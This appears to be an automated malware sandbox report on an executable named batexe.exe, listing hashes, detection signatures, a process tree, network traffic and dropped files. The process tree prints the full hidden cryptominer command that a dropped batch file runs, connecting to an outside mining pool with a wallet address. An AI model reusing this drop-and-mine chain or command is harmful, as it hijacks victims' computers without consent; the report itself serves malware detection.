Analysis

  • max time kernel
    294s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    22/02/2024, 04:12 UTC

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Users\Admin\AppData\Local\Temp\630F.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\630F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\630F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\65EE.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:820
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3180

Network

  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.a-0001.a-msedge.net
    g-bing-com.a-0001.a-msedge.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=135B2B2FABB8609E24563F02AAD36185; domain=.bing.com; expires=Tue, 18-Mar-2025 04:12:15 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 8341B27A8D894C7B8A29805268BD6873 Ref B: FRAEDGE1516 Ref C: 2024-02-22T04:12:15Z
    date: Thu, 22 Feb 2024 04:12:14 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=135B2B2FABB8609E24563F02AAD36185
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=DJo-ZU1vJIF7BEN3_JHMokrw2BpysqkHafTHkR7P5I8; domain=.bing.com; expires=Tue, 18-Mar-2025 04:12:16 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 05E026F995394B92BFD8516DB81FA524 Ref B: FRAEDGE1516 Ref C: 2024-02-22T04:12:16Z
    date: Thu, 22 Feb 2024 04:12:15 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid=
    Remote address:
    204.79.197.200:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=135B2B2FABB8609E24563F02AAD36185; MSPTC=DJo-ZU1vJIF7BEN3_JHMokrw2BpysqkHafTHkR7P5I8
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 32DD972ACEB441878C41E521BCF97E0C Ref B: FRAEDGE1516 Ref C: 2024-02-22T04:12:16Z
    date: Thu, 22 Feb 2024 04:12:16 GMT
  • flag-us
    DNS
    68.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    yespower.sea.mine.zpool.ca
    cpuminer-sse2.exe
    Remote address:
    8.8.8.8:53
    Request
    yespower.sea.mine.zpool.ca
    IN A
    Response
    yespower.sea.mine.zpool.ca
    IN A
    198.50.168.213
  • flag-us
    DNS
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41deploystaticakamaitechnologiescom
  • flag-us
    DNS
    213.168.50.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    213.168.50.198.in-addr.arpa
    IN PTR
    Response
    213.168.50.198.in-addr.arpa
    IN PTR
    minezpoolca
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0lgwllnwnet
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 204.79.197.200:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid=
    tls, http2
    2.8kB
    10.0kB
    40
    39

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e79776797c454af6b871ab9df506cff6&localId=w:A78D43AF-52D1-C43D-4997-6E1856A96FC8&deviceId=6825825702374015&anid=

    HTTP Response

    204
  • 198.50.168.213:6234
    yespower.sea.mine.zpool.ca
    cpuminer-sse2.exe
    9.3kB
    11.5kB
    94
    99
  • 127.0.0.1:64693
    cpuminer-sse2.exe
  • 127.0.0.1:64695
    cpuminer-sse2.exe
  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    158 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    68.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    68.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    yespower.sea.mine.zpool.ca
    dns
    cpuminer-sse2.exe
    72 B
    88 B
    1
    1

    DNS Request

    yespower.sea.mine.zpool.ca

    DNS Response

    198.50.168.213

  • 8.8.8.8:53
    41.110.16.96.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    41.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    213.168.50.198.in-addr.arpa
    dns
    73 B
    100 B
    1
    1

    DNS Request

    213.168.50.198.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    0.205.248.87.in-addr.arpa
    dns
    71 B
    116 B
    1
    1

    DNS Request

    0.205.248.87.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\630F.tmp\b2e.exe

    Filesize

    16.6MB

    MD5

    5af4a177a3e17e97b685fb38a4ab34ef

    SHA1

    ff35a613a14f0c8aa349dc2be489804e4e827dd6

    SHA256

    7582ea678aec71d9282ad49cfb00c2e6f28a6c7ca8b577ec30a059abc8ad1f24

    SHA512

    97d1ffb449ef520a7aeb606737da5063f9447745ab1c9ea20bc58f6e6e42f012c751d4d844b2f40ace3081a4621fea8af2532241e7df2a52ab6906d2dc9e811b

  • C:\Users\Admin\AppData\Local\Temp\630F.tmp\b2e.exe

    Filesize

    7.6MB

    MD5

    48a50d4cd008dd779f6c72b67b190dfb

    SHA1

    4e31c74922ab3635db9324500930827b1f4ae8f0

    SHA256

    6a6d9dd3b17cfa6a06b689b23c6ab09b8894255d50737c3262c4c52f3112bab0

    SHA512

    b9e9504383540276120c45db7a94a31ff566164617f749474c8e3ac9cd07a84eed11dd848311d8954042c9523c62842456e3fbde0b4851111ebb316859f5bf05

  • C:\Users\Admin\AppData\Local\Temp\630F.tmp\b2e.exe

    Filesize

    9.2MB

    MD5

    16f8babc7dcf10a8e8d5650ba4685075

    SHA1

    8800ecba37d9a3bf8bbfb5a7153ebce6b231953e

    SHA256

    734c8ff77485b20e68258facec806fbc6d4bf2a41bc4adadd8547172d19e0cf7

    SHA512

    7dd43210cef9db6775e1989a4aeadb549574a251afa03d6fe432620c75d63b4a89ba49c8f0d224c6515e44cb887a93cc09372b8352d8051911755c24a866621e

  • C:\Users\Admin\AppData\Local\Temp\65EE.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    2.3MB

    MD5

    4c04147c386ba8792ac6a03069572a8a

    SHA1

    dda67789fc1d0f2469ca95f01a5c81034853ca6a

    SHA256

    c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

    SHA512

    a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    7cf672bee2afba2dcd0c031ff985958e

    SHA1

    6b82a205db080ffdcb4a4470fce85a14413f3217

    SHA256

    c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

    SHA512

    3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    2.8MB

    MD5

    5e9964856c9c7b41030b27565eae6668

    SHA1

    95e559883d2dcc0d12f1ef16e8b45af265088174

    SHA256

    62f92fc3f492b8c0a8275a6637a02f159d832778e89a5ba4eba087ae15330276

    SHA512

    74517b04ebf499d6ae45838836ddde53c1e4660a44de6702510d9e70744ad3fe32a42c9bafa1fadf4fd858be89843884f6b966d1a5cd4fc359af2031244146bc

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    3.7MB

    MD5

    f8f5fb4092524b62fa3308f3b5f8ce97

    SHA1

    f8d8be15bf8405144bd7e735839a0937f0bdce75

    SHA256

    8101b091131e0fc76bcd1ee299381fc927ce4db36b6be3229ff68f335e10a1ae

    SHA512

    1563e8476b53d66ee50c28b8cb6cfc2d582a1f7c7241ad779f9f326e74ed2882db21ce45c7fbccf2e6444ea810aef28bde9a6e4a853c25a7665c7ae3317527bc

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    3.1MB

    MD5

    27ac431d460cc87a913c01189600e8d2

    SHA1

    edaf5057f219649c3136b8c2ce1a00c44ea18708

    SHA256

    4875d96b57441a8e33ecb4efc8b582db9fca301f49b3c7d550136cfd7228fe65

    SHA512

    aa8acb29825c987d10b30f01138a72997dc52ad443e16669188abb384e3183d2d9452b30982da4bd4b9c22f12d221b619a895ea744b4f56ab159b4e35cbe2ef0

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/2456-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2456-9-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3180-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3180-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-45-0x0000000053720000-0x00000000537B8000-memory.dmp

    Filesize

    608KB

  • memory/3180-46-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3180-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

    Filesize

    24.7MB

  • memory/3180-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-54-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-69-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3180-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3540-8-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.